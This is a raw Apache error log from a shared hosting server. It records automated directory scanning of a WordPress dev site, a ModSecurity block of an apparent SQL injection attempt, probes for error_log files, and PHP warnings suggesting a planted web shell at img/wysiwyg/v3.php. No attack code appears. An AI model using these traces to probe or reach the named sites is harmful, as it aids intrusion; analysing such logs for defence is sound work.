[Tue May 12 03:23:28.693983 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/light/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:23:29.612666 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/light/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/css/colors/light/
[Tue May 12 03:23:48.998140 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:23:49.911345 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/css/dist/
[Tue May 12 03:23:51.206054 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:23:51.551378 2026] [authz_core:error] [pid 1730207:tid 1730229] [client 185.217.125.16:53974] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/error_log, referer: binance.com
[Tue May 12 03:23:52.217387 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/fonts/
[Tue May 12 03:23:53.730732 2026] [proxy_fcgi:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:23:56.629956 2026] [security2:error] [pid 1709071:tid 1709102] [client 144.124.228.172:22897] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: e2bc9a0c8a203d0c9010cf9676b665c2||1778550825||1778550465"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agKBLLvMumyrWMfSu7qy2wAAAM8"], referer: http://la-grande-fabrique.com/?p=2314
[Tue May 12 03:23:56.630177 2026] [security2:error] [pid 1709071:tid 1709102] [client 144.124.228.172:22897] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agKBLLvMumyrWMfSu7qy2wAAAM8"], referer: http://la-grande-fabrique.com/?p=2314
[Tue May 12 03:23:56.630741 2026] [security2:error] [pid 1709071:tid 1709102] [client 144.124.228.172:22897] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agKBLLvMumyrWMfSu7qy2wAAAM8"], referer: http://la-grande-fabrique.com/?p=2314
[Tue May 12 03:23:58.587905 2026] [authz_core:error] [pid 1709071:tid 1709109] [client 185.217.125.16:49716] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/error_log, referer: binance.com
[Tue May 12 03:23:58.685970 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/pullquote/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:23:59.592735 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/pullquote/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/pullquote/
[Tue May 12 03:24:00.905912 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/2024/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:24:01.286340 2026] [security2:error] [pid 1730175:tid 1730184] [client 170.106.147.63:34714] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.of-crystal-lake.net"] [uri "/"] [unique_id "agKBMXo6NvB9WXx5V-6C1wAAAQc"]
[Tue May 12 03:24:01.823148 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/2024/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-content/uploads/2024/
[Tue May 12 03:24:03.148214 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/sodium_compat/src/Core/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:24:04.041736 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/sodium_compat/src/Core/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/sodium_compat/src/Core/
[Tue May 12 03:24:05.399668 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:24:06.323951 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/js/widgets/
[Tue May 12 03:24:07.660275 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/.well-known/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:24:08.543405 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/.well-known/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/.well-known/
[Tue May 12 03:24:16.544759 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/Text/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:24:17.430400 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/Text/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/Text/
[Tue May 12 03:24:18.727813 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:24:19.711995 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/PHPMailer/
[Tue May 12 03:24:21.002760 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/dist/edit-post/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:24:21.911734 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/dist/edit-post/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/css/dist/edit-post/
[Tue May 12 03:24:23.221343 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/assets/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:24:24.112999 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/assets/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/assets/
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704894/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704894/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704894/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704894/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704894/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704894/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:24:34.194464 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/includes/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:24:35.115844 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/includes/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/includes/
[Tue May 12 03:24:38.961719 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/maint/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:24:39.904219 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/maint/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/maint/
[Tue May 12 03:24:41.211791 2026] [proxy_fcgi:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:24:42.288008 2026] [ssl:error] [pid 1707624:tid 1707684] [client 18.235.110.182:7513] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname cpanel.krakoukas.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 12 03:24:53.408110 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/rest-api/fields/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:24:54.291554 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/rest-api/fields/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/rest-api/fields/
[Tue May 12 03:25:02.296934 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:25:03.187340 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/certificates/
[Tue May 12 03:25:04.513552 2026] [proxy_fcgi:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:25:09.094131 2026] [autoindex:error] [pid 1730175:tid 1730196] [client 85.203.21.79:60075] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:25:09.994803 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/Text/Diff/
[Tue May 12 03:25:23.986669 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/code/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:25:24.891835 2026] [autoindex:error] [pid 1709071:tid 1709105] [client 85.203.21.110:32505] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/code/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/code/
[Tue May 12 03:25:33.010395 2026] [:error] [pid 1730175:tid 1730181] [client 46.151.178.13:57592] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Tue May 12 03:25:35.799294 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/languages/themes/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:25:36.692756 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/languages/themes/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-content/languages/themes/
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899830/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899830/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899830/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899830/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899830/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899830/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:25:40.508778 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:25:41.397100 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/css/colors/midnight/
[Tue May 12 03:25:44.912041 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/sodium_compat/lib/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:25:45.807183 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/sodium_compat/lib/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/sodium_compat/lib/
[Tue May 12 03:25:47.108759 2026] [proxy_fcgi:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:25:49.644267 2026] [proxy_fcgi:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01071: Got error 'Primary script unknown'
